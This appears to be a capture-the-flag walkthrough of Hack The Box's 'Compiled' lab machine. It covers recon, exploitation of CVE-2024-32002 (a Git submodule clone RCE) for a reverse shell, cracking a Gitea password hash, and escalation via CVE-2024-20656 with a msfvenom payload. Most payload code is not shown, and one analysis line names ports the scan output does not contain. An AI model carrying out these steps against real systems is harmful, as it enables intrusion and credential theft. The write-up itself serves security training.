Contents
- 1 Introduction to Compiled:
- 2 Objective:
- 3 Enumerating the Machine
- 4 Web Enumeration:
- 5 What is CVE-2024-32002?
- 6 CVE-2024-32002 Exploitation on Compiled machine
- 7 GIT exploitation on the machine
- 8 Enumerate the database using sqlite3
- 9 Escalate to Root Privileges Access on Compiled machine
- 10 CVE-2024-20656 Vulnerability on Compiled machine
- 11 Step-by-Step on the exploitation using CyberKill Chain Mindset
- 12 Obtaining the root flag
Introduction to Compiled:
In this write-up, we will explore the “Compiled” machine from Hack The Box, which is categorized as a medium-difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Compiled” machine from Hack The Box by achieving the following objectives:
User Flag:
Steps for Analyzing the Vulnerability:
First, carefully review the source code for any indications related to a recent CVE. There may be valuable hints within the code itself or in the HTTP user-agent string, especially if the server tries to clone a remote repository from your HTTP server. These details can provide insights into potential vulnerabilities.
If you’re still facing difficulties, pay close attention to the Git version running on the server. The version could be crucial, as certain vulnerabilities are specific to particular Git releases, and knowing the version could help you identify the relevant issue.
Root Flag:
Due to the environment on the box, you may need to specify the full path to certain Windows binaries that share the same name as their Linux counterparts. This is important to ensure that the correct version of the binary is executed in the context of the target system.
For simple tasks, I prefer using evil-winrm, as it provides a straightforward way to interact with Windows systems. However, for more advanced post-exploitation enumeration, I have often found that evil-winrm performs poorly and may not be sufficient for complex tasks.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.26Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb/compiled]
└──╼ $nmap -sC -sV 10.10.11.26 -oA initial
# Nmap 7.94SVN scan initiated Thu Aug 1 08:04:22 2024 as: nmap -sC -sV -oA initial -Pn 10.10.11.26
Nmap scan report for 10.10.11.26 (10.10.11.26)
Host is up (0.014s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=18a66487d368d8af; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=4lEe7pSIJGCC7M7OFKOhI_5HsdA6MTcyMjUxMzQ2OTk5OTM3MDIwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 01 Aug 2024 11:57:49 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-arc-green">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Git</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=d3a762ab7eae504f; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=UXHCiLKMV_gysw1MW1p2jFJ6D5g6MTcyMjUxMzQ3NTE0Njc2MzcwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 01 Aug 2024 11:57:55 GMT
|_ Content-Length: 0
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.12.3
| Date: Thu, 01 Aug 2024 11:57:50 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 5234
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Compiled - Code Compiling Services</title>
| <!-- Bootstrap CSS -->
| <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
| <!-- Custom CSS -->
| <style>
| your custom CSS here */
| body {
| font-family: 'Ubuntu Mono', monospace;
| background-color: #272822;
| color: #ddd;
| .jumbotron {
| background-color: #1e1e1e;
| color: #fff;
| padding: 100px 20px;
| margin-bottom: 0;
| .services {
| RTSPRequest:
| <!DOCTYPE HTML>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.94SVN%I=7%D=8/1%Time=66AB7A3F%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x2
SF:0text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad
SF:\x20Request")%r(GetRequest,2AA4,"HTTP/1\.0\x20200\x20OK\r\nCache-Contro
SF:l:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCon
SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_gite
SF:a=18a66487d368d8af;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cook
SF:ie:\x20_csrf=4lEe7pSIJGCC7M7OFKOhI_5HsdA6MTcyMjUxMzQ2OTk5OTM3MDIwMA;\x2
SF:0Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Opti
SF:ons:\x20SAMEORIGIN\r\nDate:\x20Thu,\x2001\x20Aug\x202024\x2011:57:49\x2
SF:0GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"them
SF:e-arc-green\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width
SF:=device-width,\x20initial-scale=1\">\n\t<title>Git</title>\n\t<link\x20
SF:rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjoiR2l
SF:0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waW
SF:xlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkL
SF:mh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6
SF:ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
SF:")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allo
SF:wed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Control:\x20max-age=0,\
SF:x20private,\x20must-revalidate,\x20no-transform\r\nSet-Cookie:\x20i_lik
SF:e_gitea=d3a762ab7eae504f;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSe
SF:t-Cookie:\x20_csrf=UXHCiLKMV_gysw1MW1p2jFJ6D5g6MTcyMjUxMzQ3NTE0Njc2Mzcw
SF:MA;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Fram
SF:e-Options:\x20SAMEORIGIN\r\nDate:\x20Thu,\x2001\x20Aug\x202024\x2011:57
SF::55\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.
SF:1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=u
SF:tf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.94SVN%I=7%D=8/1%Time=66AB7A40%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,10A5,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.0\.3\
SF:x20Python/3\.12\.3\r\nDate:\x20Thu,\x2001\x20Aug\x202024\x2011:57:50\x2
SF:0GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:
SF:\x205234\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20la
SF:ng=\"en\">\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"UTF-8\">\n\x20\x
SF:20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x
SF:20initial-scale=1\.0\">\n\x20\x20\x20\x20<title>Compiled\x20-\x20Code\x
SF:20Compiling\x20Services</title>\n\x20\x20\x20\x20<!--\x20Bootstrap\x20C
SF:SS\x20-->\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"https:
SF://stackpath\.bootstrapcdn\.com/bootstrap/4\.5\.2/css/bootstrap\.min\.cs
SF:s\">\n\x20\x20\x20\x20<!--\x20Custom\x20CSS\x20-->\n\x20\x20\x20\x20<st
SF:yle>\n\x20\x20\x20\x20\x20\x20\x20\x20/\*\x20Add\x20your\x20custom\x20C
SF:SS\x20here\x20\*/\n\x20\x20\x20\x20\x20\x20\x20\x20body\x20{\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20'Ubuntu\x20Mono'
SF:,\x20monospace;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20backgr
SF:ound-color:\x20#272822;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20color:\x20#ddd;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\.jumbotron\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20background-color:\x20#1e1e1e;\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20color:\x20#fff;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20padding:\x20100px\x2020px;\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20margin-bottom:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20\.services\x20{\n\x20")%r(RTSPReques
SF:t,16C,"<!DOCTYPE\x20HTML>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head
SF:>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20
SF:\x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h
SF:1>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20c
SF:ode:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20
SF:request\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20<p>Error\x20code\x20explanation:\x20400\x20-\x20Bad\x20request\x2
SF:0syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n
SF:</html>\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 1 08:07:57 2024 -- 1 IP address (1 host up) scanned in 214.75 secondsAnalysis:
- Port 22 (SSH): Secure Shell service for remote access.
- Port 80 (HTTP): Web server running Apache.
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
Web Application Exploration:
A Gitea repository is running on port 3000.
It hosts two projects under Richard’s ownership and is available for access and review.
The “Compiled” project offers an integrated solution for compiling C++, C#, and .NET projects. Users can input GitHub repository URLs, facilitating effortless project compilation through http://localhost:5000 when hosted locally.
Inside the directory, there is a straightforward Flask application named app.py.Let’s begin analyzing the code.
Analyze of app.py source code:
This script is a lightweight web application built using Python and Flask. Here’s an overview of its functionality:
- Purpose of the Application:
The app provides a webpage where users can submit Git repository URLs. If a valid URL is provided, it saves the URL to a text file for future use, such as cloning and compiling the repository. - Key Features:
- Flask Framework: The application leverages Flask to create and manage the web interface. It defines a route to handle both displaying the form and processing submissions.
- Repository Management: Submitted URLs are stored in a local file (
repos.txt) for tracking. - User Interaction:
- The homepage (
/) displays a form for URL input. - After submission, the app attempts to validate the URL (though this logic is not fully implemented in the code).
- Valid URLs are saved, and a success message is displayed: “Your git repository is being cloned for compilation.”
- Invalid URLs prompt an error message: “Invalid Git repository URL.”
- The homepage (
- How It Works:
When run, the app operates onhttp://localhost:5000, accessible through a browser. Users can interact by entering URLs, which are then processed and saved.
There isn’t much to analyze or investigate further in the Calculator directory.
It refers to the Git version installed on the target machine—2.45.0.
A search through an online vulnerability database reveals that this version contains a critical vulnerability, CVE-2024-32002.
What is CVE-2024-32002?
Git is a version control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, a vulnerability existed where repositories containing submodules could be manipulated to exploit a bug in Git. This bug could deceive Git into writing files not into the submodule’s worktree but into the .git/ directory. Consequently, an attacker could inject a hook that would execute during the clone operation, preventing the user from inspecting the code before it ran. This issue has been addressed in the aforementioned patched versions. If symbolic link support is disabled in Git (e.g., by setting git config --global core.symlinks false), the attack will not be effective. As a best practice, it is advisable to avoid cloning repositories from untrusted sources.
Compiled.htb:5000 enumeration
The “Compiled” project, hosted on the Gitea repository at http://10.10.11.26:5000, allows users to input a URL to compile C++, C#, and .NET projects online. This functionality resembles an older HTB machine that was affected by the same RCE vulnerability. The reconnaissance details suggest that we can provide a Git URL (starting with “http://” and ending with “.git”) to http://ip:5000, which will then execute Git locally on the target Windows machine. This process retrieves resources, including potentially sensitive information, as indicated in the code explanation.
We can enter the Git repository URL in the field provided above.
Let’s attempt to retrieve a file from our own machine.
It worked perfectly!
CVE-2024-32002 Exploitation on Compiled machine
Next, search online to explore the capabilities of this version. I found an informative article: https://amalmurali.me/posts/git-rce/.
The article explains that you can initiate with a soft connection, and in the case of an RCE, it provides further guidance.
Let’s create a new account on the Gitea application.
We are required to create two repositories, and the naming conventions are not particularly important.
GIT exploitation on the machine
The screenshot demonstrates how to create the malicious script using Git.
Let’s trigger the Git repository we created with the malicious command previously.
After waiting for a few seconds, we successfully obtained a reverse shell as the user Richard.After waiting for a few seconds, we successfully obtained a reverse shell as the user Richard.
Enumerate the database using sqlite3
We successfully located the gitea.db file, which we can use to enumerate the database and we download the file to our local machine.
In this case, the format “pbkdf2$50000$50” indicates that the PBKDF2 algorithm was used with 50,000 iterations. The “$50” represents the length of the hash output in bytes, not the salt. PBKDF2 is a cryptographic key derivation function designed to be resistant to dictionary and rainbow table attacks.
After a while, we managed to crack the password for emily which is 12345678
We can view the user flag by executing the command type user.txt.
Escalate to Root Privileges Access on Compiled machine
CVE-2024-20656 Exploitation
Visual Studio configures NFS Exports Files, which are related to the configuration and permission settings of the Network File System (NFS) on Windows systems. NFS is a protocol that enables file access over a network, similar to local storage access, and is commonly used for file sharing between UNIX/Linux and Windows systems.
This configuration could potentially lead to unauthorized access or privilege escalation. It also brings to mind CVE-2024-20656, a local privilege escalation vulnerability in the VSStandardCollectorService150 service of Microsoft Visual Studio. This vulnerability allows an attacker to escalate privileges on a Windows system due to how the service handles file operations and directory permissions.
I noticed that Visual Studio 2019 has been configured on the victim’s machine.
CVE-2024-20656 Vulnerability on Compiled machine
Let’s conduct some research on the CVE exploitation and found a GitHub repository that we can utilize here.
Step-by-Step on the exploitation using CyberKill Chain Mindset
1. Reconnaissance: The attacker identifies the presence of the VSDiagnostics.exe tool on the target machine, which can be used to initiate a diagnostic session. They also discover a writable location (/scratchLocation) under their control.
2. Weaponization: The attacker crafts a junction point in the specified scratch location, redirecting it to a directory they control. This allows them to manipulate file movements and set permissions to their advantage.
3. Delivery: The attacker triggers the diagnostic session using the VSDiagnostics.exe tool with the malicious scratch location. This action forces the service to interact with the attacker-controlled directory.
4. Exploitation: The attacker exploits the service’s behavior of resetting DACLs (Discretionary Access Control Lists) on the files in the targeted directory. By controlling the directory (e.g., C:\ProgramData), the attacker can reset permissions to gain full control over critical system files or directories.
5. Installation: The attacker redirects the DACL reset operations to sensitive system files or directories, such as system DLL files, allowing the attacker to modify permissions and potentially load these files into privileged services.
6. Command and Control: The attacker executes code with elevated privileges by manipulating system files, enabling them to run arbitrary code within a higher privilege context.
7. Action on Objectives: To implement the exploit, after opening Expl.sln in Visual Studio, the attacker modifies the POC by adjusting the cmd variable in main.cpp to the path of VSDiagnostics.exe, as the POC is configured for Visual Studio 2022, while the target system runs Visual Studio 2019.
Obtaining the root flag
Next, we will prepare the reverse shell trojan in the designated directory. Using msfvenom, we generate a reverse shell payload and upload it to the target folder.
Subsequently, we compile and build the modified main.cpp file in release mode to generate the exploit executable.
We can view the root flag by executing the command type root.txt.